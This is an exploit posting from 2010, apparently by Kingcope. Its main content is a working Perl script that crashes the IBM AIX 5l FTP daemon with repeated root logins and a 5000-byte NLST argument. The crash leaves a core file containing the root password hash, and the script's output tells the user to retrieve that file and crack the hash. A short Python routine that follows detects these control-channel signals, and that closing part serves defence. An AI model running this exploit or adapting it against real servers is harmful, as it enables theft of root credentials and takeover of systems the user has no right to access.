AIX5l with FTP-Server Remote Root Hash Disclosure Exploit
Source: vfocus.net  Author: Kingcope  Published: 2010-07-19

### AIXCOREDUMP.PL ---
### --== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--
### CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd
### THE RESULT FILE IS SCRAMBLED - SEEK FOR DES LOOKING CRYPTO KEYS
### SUCCESSFULLY TESTED ON IBM AIX 5.1
### DISCOVERED & EXPLOITED BY KINGCOPE
### JULY 2010

use IO::Socket;

$|=1;

print "--== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--\n";
print "CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd\n";
print "BY KINGCOPE\n";
print "JULY 2010\n\n";

if ($#ARGV < 1) {
 print "USAGE: ./AIXCOREDUMP.PL <target address> <your ip> [username] [password]\n";
 print "SAMPLES:\n";
 print "YOU HAVE A LOGIN ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25 kcope passwd\n";
 print "USE GUEST ACCOUNT - NEEDS WRITE ACCESS IN /PUB ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25\n";
 exit;
}

$trgt = $ARGV[0];

$sock = IO::Socket::INET->new(PeerAddr => $trgt,
                              PeerPort => '21',
                              Proto    => 'tcp');
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;                              

if ($ARGV[2] eq "") {
 $user = "ftp"; 
 $pass = "c0deb4b3\@roothash.com";
} else {
 $user = $ARGV[2];
 $passwd = $ARGV[3]; 
}
                       
$x = <$sock>;
print "*AIX EXPLOIT* REMOTE FTPD: $x\n";
if (fork()) {
for ($k=0;$k<3;$k++) {
print "*AIX EXPLOIT* POLLUTING FTPD***\n";
print "\t$x";
print $sock "USER root\r\n";
$x = <$sock>;
print "\t$x";
print $sock "PASS sexy\r\n";
$x = <$sock>;
print "\t$x";
}

print "*AIX EXPLOIT* ACCESSING FOLDER***\n";
print $sock "USER $user\r\n";
$x = <$sock>;
print "\t$x";
print $sock "PASS $passwd\r\n";
$x = <$sock>;
print "\t$x";

if ($ARGV[2] eq "") {
print "*AIX EXPLOIT* CWD TO PUB***\n";
print $sock "CWD pub\r\n";
$x = <$sock>;
print "\t$x";
}

print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print "\t$x";

print "*AIX EXPLOIT* TRIGGERING COREDUMP***\n";
print $sock "NLST ~" . "A" x 5000 . "\r\n";
$x = <$sock>;

while(<$sock>) {
 print;
}

print "*AIX EXPLOIT* (SUCCESS)***\n*AIX EXPLOIT* NOW RETRIEVE THE core FILE WITH YOUR FAVOURITE CLIENT AND LOOKUP THE R00T HASH++CRACKIT!***\n";
exit;
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);  
}
## CHEERIO!
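
The script above leaves three traces on the FTP control channel: repeated `USER root` attempts, an `NLST` argument of about 5000 bytes, and a later retrieval of the `core` file. The following detection check over logged client commands is an added example, not part of the original script; the thresholds, finding labels and sample sessions are assumptions constructed for illustration.

```python
MAX_ARG = 512     # assumed limit; real NLST/LIST paths are far shorter
ROOT_TRIES = 2    # assumed: repeated USER root inside one session


def findings(commands):
    """Return findings for one session's ordered client command lines."""
    out, root_tries = [], 0
    for line in commands:
        verb, _, arg = line.rstrip("\r\n").partition(" ")
        verb = verb.upper()
        if verb == "USER" and arg.strip().lower() == "root":
            root_tries += 1
        elif verb in ("NLST", "LIST") and len(arg) > MAX_ARG:
            out.append("oversized-listing-arg")
        elif verb == "RETR" and arg.rsplit("/", 1)[-1] == "core":
            out.append("core-file-download")
    if root_tries >= ROOT_TRIES:
        out.insert(0, "repeated-root-login")
    return out


def verdict(commands):
    """alert: both main signals in one session; review: any single signal."""
    f = findings(commands)
    if "oversized-listing-arg" in f and "repeated-root-login" in f:
        return "alert"
    return "review" if f else "ok"


# Constructed sample sessions (not captured traffic).
SAMPLE = {
    "s1": ["USER root", "PASS x", "USER root", "PASS x", "USER root", "PASS x",
           "USER ftp", "PASS guest@example.invalid", "CWD pub",
           "PORT 192,0,2,25,40,10", "NLST ~" + "A" * 5000],
    "s2": ["USER ftp", "PASS guest@example.invalid", "CWD pub", "RETR core"],
    "s3": ["USER alice", "PASS secret", "NLST reports/2010"],
}

if __name__ == "__main__":
    for sid, cmds in SAMPLE.items():
        print(sid, verdict(cmds), findings(cmds))
```

A core file appearing in an FTP-writable directory owned by the ftpd process is a host-side signal worth pairing with these control-channel findings.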


 